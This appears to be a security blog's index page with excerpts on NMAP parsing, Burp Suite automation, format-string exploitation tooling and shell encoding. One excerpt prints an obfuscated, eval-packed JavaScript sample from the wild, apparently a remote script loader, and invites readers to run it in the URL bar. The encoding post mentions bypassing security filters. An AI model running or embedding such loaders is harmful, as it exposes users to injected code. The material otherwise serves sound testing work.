Following up on my last NMAP post, processing port scan data in a meaningful manner is essential to network penetration testing. For those who wish to skip the SQL stage and get quick results, the following one-liner will use xmlstarlet to parse a NMAP XML file: cat nmap.xml | xmlstarlet sel -T -t -m “//state[@state='open']” -m ../../.. -v address/@addr -m hostnames/hostname -i @name -o ‘ (‘ -v @name -o ‘)’ -b -b -b -o ” ” -m .. -v @portid … →
Today, we observed some potentially dangerous Javascript client-side code out in the wild. The code, which we were able to obtain at great lengths, is reproduced below: _0x65f5=["\x36\x3D\x5B\x22\x5C\x6A\x5C\x69\x5C\x61\x5C\x6E\x5C\x38\x5C\x62\x22\x2C\x22\x5C\x68\x5C\x61\x5C\x37\x5C\x6B\x5C\x62\x5C\x37\x5C\x6F\x5C\x66\x5C\x37\x5C\x70\x5C\x37\x5C\x67\x5C\x62\x22\x2C\x22\x5C\x6B\x5C\x38\x5C\x38\x5C\x37\x5C\x67\x5C\x39\x5C\x69\x5C\x65\x5C\x6D\x5C\x66\x5C\x39\x22\x2C\x22\x5C\x71\x5C\x72\x5C\x39\x5C\x6C\x22\x2C\x22\x5C\x6A\x5C\x61\x5C\x68\x22\x2C\x22\x5C\x63\x5C\x63\x5C\x38\x5C\x74\x5C\x79\x5C\x7A\x5C\x41\x5C\x78\x5C\x63\x5C\x65\x5C\x77\x22\x5D\x3B\x64\x3D\x75\x3B\x73\x3D\x64\x5B\x36\x5B\x31\x5D\x5D\x28\x36\x5B\x30\x5D\x29\x3B\x64\x5B\x36\x5B\x33\x5D\x5D\x5B\x36\x5B\x32\x5D\x5D\x28\x73\x29\x3B\x73\x5B\x36\x5B\x34\x5D\x5D\x3D\x36\x5B\x35\x5D\x3B\x76\x28\x30\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x7C\x7C\x7C\x5F\x30\x78\x65\x30\x61\x32\x7C\x78\x36\x35\x7C\x78\x37\x30\x7C\x78\x36\x34\x7C\x78\x37\x32\x7C\x78\x37\x34\x7C\x78\x32\x46\x7C\x7C\x78\x36\x38\x7C\x78\x36\x43\x7C\x78\x36\x45\x7C\x78\x36\x33\x7C\x78\x34\x33\x7C\x78\x37\x33\x7C\x78\x36\x31\x7C\x78\x37\x39\x7C\x78\x36\x39\x7C\x78\x34\x39\x7C\x78\x34\x35\x7C\x78\x36\x44\x7C\x78\x36\x32\x7C\x78\x36\x46\x7C\x7C\x78\x33\x33\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x76\x4F\x49\x64\x7C\x78\x37\x41\x7C\x78\x35\x33\x7C\x78\x34\x45\x7C\x78\x32\x45\x7C\x78\x37\x35","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xf47fx1,_0xf47fx2,_0xf47fx3,_0xf47fx4,_0xf47fx5,_0xf47fx6){_0xf47fx5=function (_0xf47fx3){return (_0xf47fx335?String[_0x65f5[5]](_0xf47fx3+29):_0xf47fx3.toString(36));} ;if(!_0x65f5[4][_0x65f5[6]](/^/,String)){while(_0xf47fx3–){_0xf47fx6[_0xf47fx5(_0xf47fx3)]=_0xf47fx4[_0xf47fx3]||_0xf47fx5(_0xf47fx3);} ;_0xf47fx4=[function (_0xf47fx5){return _0xf47fx6[_0xf47fx5];} ];_0xf47fx5=function (){return _0x65f5[7];} ;_0xf47fx3=1;} ;while(_0xf47fx3–){if(_0xf47fx4[_0xf47fx3]){_0xf47fx1=_0xf47fx1[_0x65f5[6]]( new RegExp(_0x65f5[8]+_0xf47fx5(_0xf47fx3)+_0x65f5[8],_0x65f5[9]),_0xf47fx4[_0xf47fx3]);} ;} ;return _0xf47fx1;} (_0x65f5[0],37,37,_0x65f5[3][_0x65f5[2]](_0x65f5[1]),0,{})); For those brave of heart, you can test and execute it directly by putting it in your URL location bar preceded by javascript: as shown below: The first thing we recognized was the degree … →
By converting Burp Suite Professional’s session files to XML we were able to automate the analysis of the results with XMLStarlet on the command line. Using the IBurpExtender interface, we have now automated spidering and scanning in Burp as well: BurpExtender.java takes full advantage of the IBurpExtender interface and accepts a starting URL, output name, and optional cookie string on the command line. This tool will add the URL’s domain to Burp’s scope, and begin spidering the site, saving each … →
This post discusses a tool to automatically check and keep a local copy of skipfish up-to-date. →
Burp Suite Professional’s session file is not in a useful format to extract data from. This post introduces a python script that converts this session file to a XML document. →
Here at Redspin, we don’t often get a chance to fool around with binaries. Nevertheless, during an audit we encountered a program with a simple format string attack. Not content with the manual format string exploitation process, we decided to write our own tool to automate it. After much coding, we saw that it was good, and decided to share: root@bt:~# wget http://www.redspin.com/blog/wp-files/Format%20String%20Auto%20Exploitation.tar.bz2 root@bt:~# tar jxvf Format\ String\ Auto\ Exploitation.tar.bz2 root@bt:~# cd Format\ String\ Auto\ Exploitation root@bt:~/Format String Auto Exploitation# … →
One much requested feature of NMAP is SQL output. This tool attempts to bridge that gap by providing a XML2SQL conversion, and compares the database output to other similar tools. →
Data encoding in the shell is a quick and reliable method to parse input in one type of format to format of another type. This could be done in order to determine how an application has converted input, or to encode your input in such a way as to bypass a security filter. These include some valuable methods such as HEX, HTML, URL, various password representations, common hashes and even some compression encodings. What follows are some of my favourite … →
Sed, Grep and Awk are true *nix tools, known for their awkward names and equally awkward syntax. They represent the most immediate access to Regular Expressions (REs) which are themselves worthy of knowledge. Even their attempted replacement, Perl, is also known producing useful yet unreadable code. Though I acknowledge their awkward natures, their usefulness cannot be ignored, and learning how to use each will aid you in your ascension to line processing supremacy. Each is best used in the following … →
